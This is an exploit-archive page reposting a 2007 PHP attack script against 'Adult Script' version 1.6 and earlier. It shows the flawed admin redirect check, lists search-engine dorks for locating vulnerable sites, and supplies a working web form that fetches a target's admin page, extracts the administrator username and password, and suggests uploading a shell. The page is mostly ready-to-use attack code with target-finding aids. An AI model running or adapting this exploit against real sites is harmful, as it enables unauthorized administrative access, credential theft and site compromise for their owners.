首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adult Script <= 1.6 Unauthorized Administrative Access Exploit
来源:http://www.biyofrm.com 作者:Liz0ziM 发布时间:2007-12-17  
<? ob_implicit_flush(true); ?>
<title>Adult Script Unauthorized Administrative Access Exploit</title>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;} 
textarea{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}
a:link {
color: #999999;
text-decoration: none;
        font-weight: bold;
background-color:#000000;
}
a:visited {
color: #999999;
text-decoration: none;
        font-weight: bold;
background-color:#000000;
}
</style><br>

<h3>Adult Script Unauthorized Administrative Access Exploit</h3><br>
Exploit Coded By Liz0ziM From <a href="http://www.biyofrm.com">BiyoSecurityTeam</a><br>
Greetz My all friend and BiyoSecurityTeam User..
<br>
Software site: http://www.adultscript.net/<br>
Demo: http://www.adultscript.net/demo/<br>

Vulnerable code in <b>admin/administrator.php</b> near lines 5-8</b>

<pre>
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("Location: logout.php"); // Bypass Me :D
}
</pre>
<br>
<b>Dork</b>:<br>
inurl:submit-user-link.html<br>
inurl:video-listing-cat<br>
inurl:hosted-videos<br>
inurl:porn-listing-cat<br>
"Powered By AdultScript.NET"<br>
"Copyright 2007 [IAG].AdultScript.v1.5.Nulled"<br>
<br>
<form method="POST" action="">
<input name="adres" type="text" value="Target  example: http://www.site.com/" size="70" onFocus="if(this.value=='Target  example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target  example: http://www.site.com/'">
<input name="yolla" type="submit" value="Send">
</form>

<br>
<?php
function dosya_indir($liz0){


$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $liz0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$veri = curl_exec($ch);
curl_close($ch);

return $veri;

}

$desen='|value="(.*)"|';

if($_POST[yolla])
{
$adres=$_POST[adres];

if(!eregi("http",$adres))
{
$adres="http://".$adres;
}
if($adres=="") { echo 'Boş Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."<br>";
sleep(1);
echo 'Sending Evil Code.......<br>';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);

if(eregi('value="',$kaynak)) {
echo "Exploit Has Been Succeful <br>";
preg_match_all($desen,$kaynak,$sonuc);
echo "<a target='_blank' href='".$adres."/admin/'>".$adres."/admin/</a><br>";
echo "<b>Username</b> :".htmlspecialchars($sonuc[1][0])."<br>";
echo "<b>Password</b>:".htmlspecialchars($sonuc[1][1])."<br>";
echo $adres."/admin/videolinks_view.php edit video and upload shell :)";
}
else
{
echo "Exploit Has Been Failed! <br>";
}


}
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP OpenView Network Node Manag
·Samba 3.0.27a send_mailslot()
·Apple Mac OS X xnu <= 1228.0 L
·MS07-065 Message Queuing Servi
·SquirrelMail G/PGP Plugin dele
·SurgeMail v.38k4 webmail Host
·Simple HTTPD 1.3 (/aux) Remote
·Rosoft Media Player <= 4.1.7 .
·Online Media Technologies AVSM
·jetAudio 7.0.5 COWON Media Cen
·MonAlbum 0.87 Upload Shell / P
·iMesh <= 7.1.0.x (IMWeb.dll 7.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved